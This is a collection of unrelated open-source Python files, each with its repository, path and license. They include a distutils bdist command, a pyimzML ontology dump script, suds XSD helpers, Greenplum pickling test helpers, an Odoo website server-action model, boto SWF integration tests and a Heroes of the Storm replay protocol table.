ks_session.auth = self.get_v3_auth(v3_auth_url)
return ks_session
def main(argv=sys.argv[1:]):
try:
return GBPShell(NEUTRON_API_VERSION).run(map(encodeutils.safe_decode,
argv))
except exc.NeutronClientException:
return 1
except Exception as e:
print(unicode(e))
return 1
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| apache-2.0 |
jchevin/MissionPlanner-master | Lib/distutils/command/bdist.py | 228 | 5596 | """distutils.command.bdist
Implements the Distutils 'bdist' command (create a built [binary]
distribution)."""
__revision__ = "$Id$"
import os
from distutils.util import get_platform
from distutils.core import Command
from distutils.errors import DistutilsPlatformError, DistutilsOptionError
def show_formats():
"""Print list of available formats (arguments to "--format" option).
"""
from distutils.fancy_getopt import FancyGetopt
formats = []
for format in bdist.format_commands:
formats.append(("formats=" + format, None,
bdist.format_command[format][1]))
pretty_printer = FancyGetopt(formats)
pretty_printer.print_help("List of available distribution formats:")
class bdist(Command):
description = "create a built (binary) distribution"
user_options = [('bdist-base=', 'b',
"temporary directory for creating built distributions"),
('plat-name=', 'p',
"platform name to embed in generated filenames "
"(default: %s)" % get_platform()),
('formats=', None,
"formats for distribution (comma-separated list)"),
('dist-dir=', 'd',
"directory to put final built distributions in "
"[default: dist]"),
('skip-build', None,
"skip rebuilding everything (for testing/debugging)"),
('owner=', 'u',
"Owner name used when creating a tar file"
" [default: current user]"),
('group=', 'g',
"Group name used when creating a tar file"
" [default: current group]"),
]
boolean_options = ['skip-build']
help_options = [
('help-formats', None,
"lists available distribution formats", show_formats),
]
# The following commands do not take a format option from bdist
no_format_option = ('bdist_rpm',)
# This won't do in reality: will need to distinguish RPM-ish Linux,
# Debian-ish Linux, Solaris, FreeBSD, ..., Windows, Mac OS.
default_format = {'posix': 'gztar',
'nt': 'zip',
'os2': 'zip'}
# Establish the preferred order (for the --help-formats option).
format_commands = ['rpm', 'gztar', 'bztar', 'ztar', 'tar',
'wininst', 'zip', 'msi']
# And the real information.
format_command = {'rpm': ('bdist_rpm', "RPM distribution"),
'gztar': ('bdist_dumb', "gzip'ed tar file"),
'bztar': ('bdist_dumb', "bzip2'ed tar file"),
'ztar': ('bdist_dumb', "compressed tar file"),
'tar': ('bdist_dumb', "tar file"),
'wininst': ('bdist_wininst',
"Windows executable installer"),
'zip': ('bdist_dumb', "ZIP file"),
'msi': ('bdist_msi', "Microsoft Installer")
}
def initialize_options(self):
self.bdist_base = None
self.plat_name = None
self.formats = None
self.dist_dir = None
self.skip_build = 0
self.group = None
self.owner = None
def finalize_options(self):
# have to finalize 'plat_name' before 'bdist_base'
if self.plat_name is None:
if self.skip_build:
self.plat_name = get_platform()
else:
self.plat_name = self.get_finalized_command('build').plat_name
# 'bdist_base' -- parent of per-built-distribution-format
# temporary directories (eg. we'll probably have
# "build/bdist.<plat>/dumb", "build/bdist.<plat>/rpm", etc.)
if self.bdist_base is None:
build_base = self.get_finalized_command('build').build_base
self.bdist_base = os.path.join(build_base,
'bdist.' + self.plat_name)
self.ensure_string_list('formats')
if self.formats is None:
try:
self.formats = [self.default_format[os.name]]
except KeyError:
raise DistutilsPlatformError, \
"don't know how to create built distributions " + \
"on platform %s" % os.name
if self.dist_dir is None:
self.dist_dir = "dist"
def run(self):
# Figure out which sub-commands we need to run.
commands = []
for format in self.formats:
try:
commands.append(self.format_command[format][0])
except KeyError:
raise DistutilsOptionError, "invalid format '%s'" % format
# Reinitialize and run each command.
for i in range(len(self.formats)):
cmd_name = commands[i]
sub_cmd = self.reinitialize_command(cmd_name)
if cmd_name not in self.no_format_option:
sub_cmd.format = self.formats[i]
# passing the owner and group names for tar archiving
if cmd_name == 'bdist_dumb':
sub_cmd.owner = self.owner
sub_cmd.group = self.group
# If we're going to need to run this command again, tell it to
# keep its temporary files around so subsequent runs go faster.
if cmd_name in commands[i+1:]:
sub_cmd.keep_temp = 1
self.run_command(cmd_name)
| gpl-3.0 |
pyIMS/pyimzML | pyimzml/ontology/dump_obo_files.py | 2 | 1779 | # This file is not intended for general use. Its purpose is to dump the .obo files that define
# the cvParam accession fields into a dependency-free format that can be bundled with pyimzml.
#
# It requires the additional pip dependency obonet==0.2.6
import re
from collections import defaultdict
from datetime import datetime
from pprint import pformat
ontology_sources = [
('ms', 'https://raw.githubusercontent.com/HUPO-PSI/psi-ms-CV/master/psi-ms.obo', ['MS']),
('uo', 'https://raw.githubusercontent.com/bio-ontology-research-group/unit-ontology/master/unit.obo', ['UO']),
('ims', 'https://raw.githubusercontent.com/imzML/imzML/f2c8b6ce2affa8d8eef74d4bfe5922c815ff4dff/imagingMS.obo', ['IMS']),
]
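# Illustrative note (added): each entry is (ontology key, .obo source URL,
# accession prefixes to keep); in the loop below a node ID is retained only
# when it starts with one of the listed prefixes, e.g. 'MS' for psi-ms terms.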
if __name__ == '__main__':
import obonet
now = datetime.utcnow().isoformat()
for ontology_name, src, namespaces in ontology_sources:
print(f'Parsing {ontology_name}')
graph = obonet.read_obo(src, ignore_obsolete=False)
terms = {}
enums = defaultdict(list)
for node_id in graph.nodes:
node = graph.nodes[node_id]
if any(node_id.startswith(ns) for ns in namespaces) and 'name' in node:
dtype = None
for xref in node.get('xref', []):
m = re.match(r'^value-type:xsd\\:(\w+) ', xref)
if m:
dtype = 'xsd:' + m[1]
break
terms[node_id] = (node['name'], dtype)
with open(f'./{ontology_name}.py', 'wt') as f:
f.write('# DO NOT EDIT BY HAND\n')
f.write(f'# This file was autogenerated by dump_obo_files.py at {now}\n')
terms_repr = pformat(terms, indent=4, width=100)
f.write(f'terms = {terms_repr}\n')
| apache-2.0 |
lmyrefelt/CouchPotatoServer | libs/suds/xsd/__init__.py | 205 | 3007 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
The I{schema} module provides an intelligent representation of
an XSD schema. The I{raw} model is the XML tree and the I{model}
is the denormalized, objectified and intelligent view of the schema.
Most of the I{value-add} provided by the model is centered around
transparent referenced type resolution and targeted denormalization.
"""
from logging import getLogger
from suds import *
from suds.sax import Namespace, splitPrefix
log = getLogger(__name__)
def qualify(ref, resolvers, defns=Namespace.default):
"""
Get a reference that is I{qualified} by namespace.
@param ref: A referenced schema type name.
@type ref: str
@param resolvers: A list of objects to be used to resolve types.
@type resolvers: [L{sax.element.Element},]
@param defns: An optional target namespace used to qualify references
when no prefix is specified.
@type defns: A default namespace I{tuple: (prefix,uri)} used when ref not prefixed.
@return: A qualified reference.
@rtype: (name, namespace-uri)
"""
ns = None
p, n = splitPrefix(ref)
if p is not None:
if not isinstance(resolvers, (list, tuple)):
resolvers = (resolvers,)
for r in resolvers:
resolved = r.resolvePrefix(p)
if resolved[1] is not None:
ns = resolved
break
if ns is None:
raise Exception('prefix (%s) not resolved' % p)
else:
ns = defns
return (n, ns[1])
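# Illustrative sketch (added; the resolver name is hypothetical): with a
# resolver whose prefix map binds 'xs' to the XSD namespace,
#   qualify('xs:string', [schema_root])
# returns ('string', 'http://www.w3.org/2001/XMLSchema'); an unprefixed
# reference instead falls back to the I{defns} default namespace.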
def isqref(object):
"""
Get whether the object is a I{qualified reference}.
@param object: An object to be tested.
@type object: I{any}
@rtype: boolean
@see: L{qualify}
"""
return (\
isinstance(object, tuple) and \
len(object) == 2 and \
isinstance(object[0], basestring) and \
isinstance(object[1], basestring))
class Filter:
def __init__(self, inclusive=False, *items):
self.inclusive = inclusive
self.items = items
def __contains__(self, x):
if self.inclusive:
result = ( x in self.items )
else:
result = ( x not in self.items )
return result
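# Minimal usage sketch (added for illustration): a Filter is exclusive by
# default, so membership means "not listed":
#   f = Filter(False, 'a', 'b')
#   'c' in f   # True  -- not listed, passes the filter
#   'a' in f   # False -- listed, filtered out
# With inclusive=True the test becomes ordinary containment.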
| gpl-3.0 |
lintzc/gpdb | gpMgmt/bin/gppylib/operations/test_utils_helper.py | 52 | 1452 | from gppylib.operations import Operation
"""
These objects, needed for gppylib.operations.test.test_utils, are pulled out of said file for
pickle/import/visibility reasons. See gppylib.operations.utils.RemoteOperation, #4.
"""
class TestOperation(Operation):
def execute(self):
return 1
class MyException(Exception): pass
class RaiseOperation(Operation):
def execute(self):
raise MyException()
# Exception classes cannot be nested inside another class:
# nested exceptions cannot be pickled, for reasons inherent to python. See utils.py
class RaiseOperation_Nested(Operation):
def execute(self):
raise RaiseOperation_Nested.MyException2()
class MyException2(Exception): pass
# Exceptions with args must follow a strange idiom! http://bugs.python.org/issue1692335
class RaiseOperation_Unsafe(Operation):
def execute(self):
raise ExceptionWithArgsUnsafe(1, 2)
class RaiseOperation_Safe(Operation):
def execute(self):
raise ExceptionWithArgs(1, 2)
# This is the proper idiom for a pickle-able exception with arguments: http://bugs.python.org/issue1692335
class ExceptionWithArgs(Exception):
def __init__(self, x, y):
self.x, self.y = x, y
Exception.__init__(self, x, y)
class ExceptionWithArgsUnsafe(Exception):
def __init__(self, x, y):
self.x, self.y = x, y
class RaiseOperation_Unpicklable(Operation):
def execute(self):
from pygresql import pg
raise pg.DatabaseError()
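# Illustrative sketch: why the idiom above matters. Calling
# Exception.__init__ with the args populates self.args, which is what
# pickle uses to reconstruct the exception; the "unsafe" variant leaves
# self.args empty and cannot be round-tripped.
if __name__ == '__main__':
    import pickle
    ok = pickle.loads(pickle.dumps(ExceptionWithArgs(1, 2)))
    assert (ok.x, ok.y) == (1, 2)
    try:
        pickle.loads(pickle.dumps(ExceptionWithArgsUnsafe(1, 2)))
    except TypeError:
        # on the Python 2 this module targets, the args never reached
        # Exception.__init__, so the exception cannot be rebuilt
        pass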
| apache-2.0 |
nathanaevitas/odoo | openerp/addons/website/models/ir_actions.py | 363 | 3074 | # -*- coding: utf-8 -*-
import urlparse
from openerp.http import request
from openerp.osv import fields, osv
class actions_server(osv.Model):
""" Add website option in server actions. """
_name = 'ir.actions.server'
_inherit = ['ir.actions.server']
def _compute_website_url(self, cr, uid, id, website_path, xml_id, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url', context=context)
link = website_path or xml_id or (id and '%d' % id) or ''
if base_url and link:
path = '%s/%s' % ('/website/action', link)
return '%s' % urlparse.urljoin(base_url, path)
return ''
def _get_website_url(self, cr, uid, ids, name, args, context=None):
res = dict.fromkeys(ids, False)
for action in self.browse(cr, uid, ids, context=context):
if action.state == 'code' and action.website_published:
res[action.id] = self._compute_website_url(cr, uid, action.id, action.website_path, action.xml_id, context=context)
return res
_columns = {
'xml_id': fields.function(
osv.osv.get_xml_id, type='char', string="External ID",
help="ID of the action if defined in a XML file"),
'website_path': fields.char('Website Path'),
'website_url': fields.function(
_get_website_url, type='char', string='Website URL',
help='The full URL to access the server action through the website.'),
'website_published': fields.boolean(
'Available on the Website', copy=False,
            help='A code server action can be executed from the website, using a dedicated '
                 'controller. The address is <base>/website/action/<website_path>. '
                 'Set this field to True to allow users to run this action. If it '
                 'is set to False the action cannot be run through the website.'),
}
def on_change_website_path(self, cr, uid, ids, website_path, xml_id, context=None):
values = {
'website_url': self._compute_website_url(cr, uid, ids and ids[0] or None, website_path, xml_id, context=context)
}
return {'value': values}
def _get_eval_context(self, cr, uid, action, context=None):
""" Override to add the request object in eval_context. """
eval_context = super(actions_server, self)._get_eval_context(cr, uid, action, context=context)
if action.state == 'code':
eval_context['request'] = request
return eval_context
def run_action_code_multi(self, cr, uid, action, eval_context=None, context=None):
""" Override to allow returning response the same way action is already
returned by the basic server action behavior. Note that response has
priority over action, avoid using both. """
res = super(actions_server, self).run_action_code_multi(cr, uid, action, eval_context, context)
if 'response' in eval_context:
return eval_context['response']
return res
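# Illustrative sketch: the URL computed above is a plain urljoin of the
# web.base.url parameter and /website/action/<link>; the base URL below
# is a made-up example value.
#
#   >>> urlparse.urljoin('http://localhost:8069', '/website/action/my-path')
#   'http://localhost:8069/website/action/my-path'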
| agpl-3.0 |
jayceyxc/hue | desktop/core/ext-py/boto-2.42.0/tests/integration/swf/test_layer1.py | 136 | 10743 | """
Tests for Layer1 of Simple Workflow
"""
import os
import unittest
import time
from boto.swf.layer1 import Layer1
from boto.swf import exceptions as swf_exceptions
# A standard AWS account is permitted a maximum of 100 SWF domains,
# registered or deprecated. Deleting deprecated domains on demand does
# not appear possible. Therefore, these tests reuse a default or
# user-named testing domain. This is named by the user via the environment
# variable BOTO_SWF_UNITTEST_DOMAIN, if available. Otherwise the default
# testing domain is literally "boto-swf-unittest-domain". Do not use
# the testing domain for other purposes.
BOTO_SWF_UNITTEST_DOMAIN = os.environ.get("BOTO_SWF_UNITTEST_DOMAIN",
"boto-swf-unittest-domain")
# A standard domain can have a maximum of 10,000 workflow types and
# activity types, registered or deprecated. Therefore, eventually any
# tests which register new workflow types or activity types would begin
# to fail with LimitExceeded. Instead of generating new workflow types
# and activity types, these tests reuse the existing types.
# The consequence of the limits and inability to delete deprecated
# domains, workflow types, and activity types is that the tests in
# this module will not test for the three register actions:
# * register_domain
# * register_workflow_type
# * register_activity_type
# Instead, the setUp of the TestCase creates a domain, workflow type,
# and activity type, expecting that they may already exist, and the
# tests themselves test other things.
# If you really want to re-test the register_* functions in their
# ability to create things (rather than just reporting that they
# already exist), you'll need to use a new BOTO_SWF_UNITTEST_DOMAIN.
# But, beware that once you hit 100 domains, you cannot create any
# more, delete existing ones, or rename existing ones.
# Some API calls establish resources, but these resources are not instantly
# available to the next API call. For testing purposes, it is necessary to
# have a short pause to avoid having tests fail for invalid reasons.
PAUSE_SECONDS = 4
class SimpleWorkflowLayer1TestBase(unittest.TestCase):
"""
There are at least two test cases which share this setUp/tearDown
and the class-based parameter definitions:
* SimpleWorkflowLayer1Test
* tests.swf.test_layer1_workflow_execution.SwfL1WorkflowExecutionTest
"""
swf = True
# Some params used throughout the tests...
# Domain registration params...
_domain = BOTO_SWF_UNITTEST_DOMAIN
_workflow_execution_retention_period_in_days = 'NONE'
_domain_description = 'test workflow domain'
# Type registration params used for workflow type and activity type...
_task_list = 'tasklist1'
# Workflow type registration params...
_workflow_type_name = 'wft1'
_workflow_type_version = '1'
_workflow_type_description = 'wft1 description'
_default_child_policy = 'REQUEST_CANCEL'
_default_execution_start_to_close_timeout = '600'
_default_task_start_to_close_timeout = '60'
# Activity type registration params...
_activity_type_name = 'at1'
_activity_type_version = '1'
_activity_type_description = 'at1 description'
_default_task_heartbeat_timeout = '30'
_default_task_schedule_to_close_timeout = '90'
_default_task_schedule_to_start_timeout = '10'
_default_task_start_to_close_timeout = '30'
def setUp(self):
# Create a Layer1 connection for testing.
# Tester needs boto config or keys in environment variables.
self.conn = Layer1()
# Register a domain. Expect None (success) or
# SWFDomainAlreadyExistsError.
try:
r = self.conn.register_domain(self._domain,
self._workflow_execution_retention_period_in_days,
description=self._domain_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFDomainAlreadyExistsError:
pass
# Register a workflow type. Expect None (success) or
# SWFTypeAlreadyExistsError.
try:
r = self.conn.register_workflow_type(self._domain,
self._workflow_type_name, self._workflow_type_version,
task_list=self._task_list,
default_child_policy=self._default_child_policy,
default_execution_start_to_close_timeout=
self._default_execution_start_to_close_timeout,
default_task_start_to_close_timeout=
self._default_task_start_to_close_timeout,
description=self._workflow_type_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFTypeAlreadyExistsError:
pass
# Register an activity type. Expect None (success) or
# SWFTypeAlreadyExistsError.
try:
r = self.conn.register_activity_type(self._domain,
self._activity_type_name, self._activity_type_version,
task_list=self._task_list,
default_task_heartbeat_timeout=
self._default_task_heartbeat_timeout,
default_task_schedule_to_close_timeout=
self._default_task_schedule_to_close_timeout,
default_task_schedule_to_start_timeout=
self._default_task_schedule_to_start_timeout,
default_task_start_to_close_timeout=
self._default_task_start_to_close_timeout,
description=self._activity_type_description)
assert r is None
time.sleep(PAUSE_SECONDS)
except swf_exceptions.SWFTypeAlreadyExistsError:
pass
def tearDown(self):
# Delete what we can...
pass
class SimpleWorkflowLayer1Test(SimpleWorkflowLayer1TestBase):
def test_list_domains(self):
# Find the domain.
r = self.conn.list_domains('REGISTERED')
found = None
for info in r['domainInfos']:
if info['name'] == self._domain:
found = info
break
self.assertNotEqual(found, None, 'list_domains; test domain not found')
# Validate some properties.
self.assertEqual(found['description'], self._domain_description,
'list_domains; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_domains; status does not match')
def test_list_workflow_types(self):
# Find the workflow type.
r = self.conn.list_workflow_types(self._domain, 'REGISTERED')
found = None
for info in r['typeInfos']:
if ( info['workflowType']['name'] == self._workflow_type_name and
info['workflowType']['version'] == self._workflow_type_version ):
found = info
break
self.assertNotEqual(found, None, 'list_workflow_types; test type not found')
# Validate some properties.
self.assertEqual(found['description'], self._workflow_type_description,
'list_workflow_types; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_workflow_types; status does not match')
def test_list_activity_types(self):
# Find the activity type.
r = self.conn.list_activity_types(self._domain, 'REGISTERED')
found = None
for info in r['typeInfos']:
if info['activityType']['name'] == self._activity_type_name:
found = info
break
self.assertNotEqual(found, None, 'list_activity_types; test type not found')
# Validate some properties.
self.assertEqual(found['description'], self._activity_type_description,
'list_activity_types; description does not match')
self.assertEqual(found['status'], 'REGISTERED',
'list_activity_types; status does not match')
def test_list_closed_workflow_executions(self):
# Test various legal ways to call function.
latest_date = time.time()
oldest_date = time.time() - 3600
# With startTimeFilter...
self.conn.list_closed_workflow_executions(self._domain,
start_latest_date=latest_date, start_oldest_date=oldest_date)
# With closeTimeFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date)
# With closeStatusFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
close_status='COMPLETED')
# With tagFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
tag='ig')
# With executionFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
workflow_id='ig')
# With typeFilter...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
workflow_name='ig', workflow_version='ig')
# With reverseOrder...
self.conn.list_closed_workflow_executions(self._domain,
close_latest_date=latest_date, close_oldest_date=oldest_date,
reverse_order=True)
    def test_list_open_workflow_executions(self):
        # Test various legal ways to call function.
        latest_date = time.time()
        oldest_date = time.time() - 3600
        # With required params only...
        self.conn.list_open_workflow_executions(self._domain,
            oldest_date, latest_date=latest_date)
        # With tagFilter...
        self.conn.list_open_workflow_executions(self._domain,
            oldest_date, latest_date=latest_date, tag='ig')
        # With executionFilter...
        self.conn.list_open_workflow_executions(self._domain,
            oldest_date, latest_date=latest_date, workflow_id='ig')
        # With typeFilter...
        self.conn.list_open_workflow_executions(self._domain,
            oldest_date, latest_date=latest_date,
            workflow_name='ig', workflow_version='ig')
        # With reverseOrder...
        self.conn.list_open_workflow_executions(self._domain,
            oldest_date, latest_date=latest_date, reverse_order=True)
| apache-2.0 |
paradox41/heroprotocol | heroprotocol/protocols/protocol47479.py | 21 | 26853 | # Copyright (c) 2015 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from heroprotocol.decoders import *
# Decoding instructions for each protocol type.
typeinfos = [
('_int',[(0,7)]), #0
('_int',[(0,4)]), #1
('_int',[(0,5)]), #2
('_int',[(0,6)]), #3
('_int',[(0,14)]), #4
('_int',[(0,22)]), #5
('_int',[(0,32)]), #6
('_choice',[(0,2),{0:('m_uint6',3),1:('m_uint14',4),2:('m_uint22',5),3:('m_uint32',6)}]), #7
('_struct',[[('m_userId',2,-1)]]), #8
('_blob',[(0,8)]), #9
('_int',[(0,8)]), #10
('_struct',[[('m_flags',10,0),('m_major',10,1),('m_minor',10,2),('m_revision',10,3),('m_build',6,4),('m_baseBuild',6,5)]]), #11
('_int',[(0,3)]), #12
('_bool',[]), #13
('_array',[(16,0),10]), #14
('_optional',[14]), #15
('_blob',[(16,0)]), #16
('_struct',[[('m_dataDeprecated',15,0),('m_data',16,1)]]), #17
('_struct',[[('m_signature',9,0),('m_version',11,1),('m_type',12,2),('m_elapsedGameLoops',6,3),('m_useScaledTime',13,4),('m_ngdpRootKey',17,5),('m_dataBuildNum',6,6),('m_fixedFileHash',17,7)]]), #18
('_fourcc',[]), #19
('_blob',[(0,7)]), #20
('_int',[(0,64)]), #21
('_struct',[[('m_region',10,0),('m_programId',19,1),('m_realm',6,2),('m_name',20,3),('m_id',21,4)]]), #22
('_struct',[[('m_a',10,0),('m_r',10,1),('m_g',10,2),('m_b',10,3)]]), #23
('_int',[(0,2)]), #24
('_optional',[10]), #25
('_struct',[[('m_name',9,0),('m_toon',22,1),('m_race',9,2),('m_color',23,3),('m_control',10,4),('m_teamId',1,5),('m_handicap',0,6),('m_observe',24,7),('m_result',24,8),('m_workingSetSlotId',25,9),('m_hero',9,10)]]), #26
('_array',[(0,5),26]), #27
('_optional',[27]), #28
('_blob',[(0,10)]), #29
('_blob',[(0,11)]), #30
('_struct',[[('m_file',30,0)]]), #31
('_optional',[13]), #32
('_int',[(-9223372036854775808,64)]), #33
('_blob',[(0,12)]), #34
('_blob',[(40,0)]), #35
('_array',[(0,6),35]), #36
('_optional',[36]), #37
('_array',[(0,6),30]), #38
('_optional',[38]), #39
('_struct',[[('m_playerList',28,0),('m_title',29,1),('m_difficulty',9,2),('m_thumbnail',31,3),('m_isBlizzardMap',13,4),('m_restartAsTransitionMap',32,16),('m_timeUTC',33,5),('m_timeLocalOffset',33,6),('m_description',34,7),('m_imageFilePath',30,8),('m_campaignIndex',10,15),('m_mapFileName',30,9),('m_cacheHandles',37,10),('m_miniSave',13,11),('m_gameSpeed',12,12),('m_defaultDifficulty',3,13),('m_modPaths',39,14)]]), #40
('_optional',[9]), #41
('_optional',[35]), #42
('_optional',[6]), #43
('_struct',[[('m_race',25,-1)]]), #44
('_struct',[[('m_team',25,-1)]]), #45
('_blob',[(0,9)]), #46
('_struct',[[('m_name',9,-18),('m_clanTag',41,-17),('m_clanLogo',42,-16),('m_highestLeague',25,-15),('m_combinedRaceLevels',43,-14),('m_randomSeed',6,-13),('m_racePreference',44,-12),('m_teamPreference',45,-11),('m_testMap',13,-10),('m_testAuto',13,-9),('m_examine',13,-8),('m_customInterface',13,-7),('m_testType',6,-6),('m_observe',24,-5),('m_hero',46,-4),('m_skin',46,-3),('m_mount',46,-2),('m_toonHandle',20,-1)]]), #47
('_array',[(0,5),47]), #48
('_struct',[[('m_lockTeams',13,-16),('m_teamsTogether',13,-15),('m_advancedSharedControl',13,-14),('m_randomRaces',13,-13),('m_battleNet',13,-12),('m_amm',13,-11),('m_competitive',13,-10),('m_practice',13,-9),('m_cooperative',13,-8),('m_noVictoryOrDefeat',13,-7),('m_heroDuplicatesAllowed',13,-6),('m_fog',24,-5),('m_observers',24,-4),('m_userDifficulty',24,-3),('m_clientDebugFlags',21,-2),('m_ammId',43,-1)]]), #49
('_int',[(1,4)]), #50
('_int',[(1,8)]), #51
('_bitarray',[(0,6)]), #52
('_bitarray',[(0,8)]), #53
('_bitarray',[(0,2)]), #54
('_bitarray',[(0,7)]), #55
('_struct',[[('m_allowedColors',52,-6),('m_allowedRaces',53,-5),('m_allowedDifficulty',52,-4),('m_allowedControls',53,-3),('m_allowedObserveTypes',54,-2),('m_allowedAIBuilds',55,-1)]]), #56
('_array',[(0,5),56]), #57
('_struct',[[('m_randomValue',6,-26),('m_gameCacheName',29,-25),('m_gameOptions',49,-24),('m_gameSpeed',12,-23),('m_gameType',12,-22),('m_maxUsers',2,-21),('m_maxObservers',2,-20),('m_maxPlayers',2,-19),('m_maxTeams',50,-18),('m_maxColors',3,-17),('m_maxRaces',51,-16),('m_maxControls',10,-15),('m_mapSizeX',10,-14),('m_mapSizeY',10,-13),('m_mapFileSyncChecksum',6,-12),('m_mapFileName',30,-11),('m_mapAuthorName',9,-10),('m_modFileSyncChecksum',6,-9),('m_slotDescriptions',57,-8),('m_defaultDifficulty',3,-7),('m_defaultAIBuild',0,-6),('m_cacheHandles',36,-5),('m_hasExtensionMod',13,-4),('m_isBlizzardMap',13,-3),('m_isPremadeFFA',13,-2),('m_isCoopMode',13,-1)]]), #58
('_optional',[1]), #59
('_optional',[2]), #60
('_struct',[[('m_color',60,-1)]]), #61
('_array',[(0,4),46]), #62
('_array',[(0,17),6]), #63
('_array',[(0,9),6]), #64
('_struct',[[('m_control',10,-20),('m_userId',59,-19),('m_teamId',1,-18),('m_colorPref',61,-17),('m_racePref',44,-16),('m_difficulty',3,-15),('m_aiBuild',0,-14),('m_handicap',0,-13),('m_observe',24,-12),('m_logoIndex',6,-11),('m_hero',46,-10),('m_skin',46,-9),('m_mount',46,-8),('m_artifacts',62,-7),('m_workingSetSlotId',25,-6),('m_rewards',63,-5),('m_toonHandle',20,-4),('m_licenses',64,-3),('m_tandemLeaderUserId',59,-2),('m_hasSilencePenalty',13,-1)]]), #65
('_array',[(0,5),65]), #66
('_struct',[[('m_phase',12,-11),('m_maxUsers',2,-10),('m_maxObservers',2,-9),('m_slots',66,-8),('m_randomSeed',6,-7),('m_hostUserId',59,-6),('m_isSinglePlayer',13,-5),('m_pickedMapTag',10,-4),('m_gameDuration',6,-3),('m_defaultDifficulty',3,-2),('m_defaultAIBuild',0,-1)]]), #67
('_struct',[[('m_userInitialData',48,-3),('m_gameDescription',58,-2),('m_lobbyState',67,-1)]]), #68
('_struct',[[('m_syncLobbyState',68,-1)]]), #69
('_struct',[[('m_name',20,-1)]]), #70
('_blob',[(0,6)]), #71
('_struct',[[('m_name',71,-1)]]), #72
('_struct',[[('m_name',71,-3),('m_type',6,-2),('m_data',20,-1)]]), #73
('_struct',[[('m_type',6,-3),('m_name',71,-2),('m_data',34,-1)]]), #74
('_array',[(0,5),10]), #75
('_struct',[[('m_signature',75,-2),('m_toonHandle',20,-1)]]), #76
('_struct',[[('m_gameFullyDownloaded',13,-14),('m_developmentCheatsEnabled',13,-13),('m_testCheatsEnabled',13,-12),('m_multiplayerCheatsEnabled',13,-11),('m_syncChecksummingEnabled',13,-10),('m_isMapToMapTransition',13,-9),('m_debugPauseEnabled',13,-8),('m_useGalaxyAsserts',13,-7),('m_platformMac',13,-6),('m_cameraFollow',13,-5),('m_baseBuildNum',6,-4),('m_buildNum',6,-3),('m_versionFlags',6,-2),('m_hotkeyProfile',46,-1)]]), #77
('_struct',[[]]), #78
('_int',[(0,16)]), #79
('_struct',[[('x',79,-2),('y',79,-1)]]), #80
('_struct',[[('m_which',12,-2),('m_target',80,-1)]]), #81
('_struct',[[('m_fileName',30,-5),('m_automatic',13,-4),('m_overwrite',13,-3),('m_name',9,-2),('m_description',29,-1)]]), #82
('_int',[(1,32)]), #83
('_struct',[[('m_sequence',83,-1)]]), #84
('_null',[]), #85
('_int',[(0,20)]), #86
('_int',[(-2147483648,32)]), #87
('_struct',[[('x',86,-3),('y',86,-2),('z',87,-1)]]), #88
('_struct',[[('m_targetUnitFlags',79,-7),('m_timer',10,-6),('m_tag',6,-5),('m_snapshotUnitLink',79,-4),('m_snapshotControlPlayerId',59,-3),('m_snapshotUpkeepPlayerId',59,-2),('m_snapshotPoint',88,-1)]]), #89
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89)}]), #90
('_struct',[[('m_target',90,-4),('m_time',87,-3),('m_verb',29,-2),('m_arguments',29,-1)]]), #91
('_struct',[[('m_data',91,-1)]]), #92
('_int',[(0,25)]), #93
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_abilCmdData',25,-1)]]), #94
('_optional',[94]), #95
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89),3:('Data',6)}]), #96
('_optional',[88]), #97
('_struct',[[('m_cmdFlags',93,-7),('m_abil',95,-6),('m_data',96,-5),('m_vector',97,-4),('m_sequence',83,-3),('m_otherUnit',43,-2),('m_unitGroup',43,-1)]]), #98
('_int',[(0,9)]), #99
('_bitarray',[(0,9)]), #100
('_array',[(0,9),99]), #101
('_choice',[(0,2),{0:('None',85),1:('Mask',100),2:('OneIndices',101),3:('ZeroIndices',101)}]), #102
